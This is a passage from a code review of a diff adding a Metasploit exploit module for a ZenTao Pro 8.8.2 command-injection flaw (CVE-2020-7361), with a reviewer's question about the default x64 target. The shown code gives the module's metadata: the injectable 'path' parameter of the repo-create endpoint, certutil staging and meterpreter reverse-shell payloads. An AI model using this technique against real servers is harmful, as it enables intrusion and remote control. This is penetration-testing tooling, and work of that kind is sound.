modules/exploits/windows/http/zentao_pro_rce.rb

```diff
@@ -0,0 +1,261 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ZenTao Pro 8.8.2 Remote Code Execution',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in ZenTao Pro
+          8.8.2 and earlier versions in order to execute arbitrary commands with
+          SYSTEM privileges.
+
+          The module first attempts to authenticate to the ZenTao dashboard. It
+          then tries to execute the payload by submitting fake repositories via
+          the 'Repo Create' function that is accessible from the dashboard via
+          CI>Repo. More precisely, the module sends HTTP POST requests to
+          '/pro/repo-create.html' that inject commands in the vulnerable 'path'
+          parameter which corresponds to the 'Client Path' input field.
+
+          Valid credentials for a ZenTao admin account are required. This module
+          has been successfully tested against ZenTao 8.8.1 and 8.8.2 running on
+          Windows 10 (XAMPP server).
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Daniel Monzón', # Discovery
+            'Melvin Boers', # PoC
+            'Erik Wynter' # @wyntererik - Metasploit
+          ],
+        'References' =>
+          [
+            ['EDB', '48633'], # PoC
+            ['CVE', '2020-7361']
+          ],
+        'Platform' => 'win',
+        'Targets' =>
+          [
+            [
+              'Windows (x86)', {
+                'Arch' => [ARCH_X86],
+                'CmdStagerFlavor' => :certutil,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+                }
+              }
+            ],
+            [
+              'Windows (x64)', {
+                'Arch' => [ARCH_X64],
+                'CmdStagerFlavor' => :certutil,
+                'DefaultOptions' => {
+                  'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+                }
+              }
+            ]
+          ],
+        'DefaultTarget' => 1,
```

Comment:
Is there a reason to default to x64 targets? x64 system are significantly more common than x86, but x86 payloads should work on x64, and this module does not appear to contain any arch-dependent logic, implying that x86 would be the better option.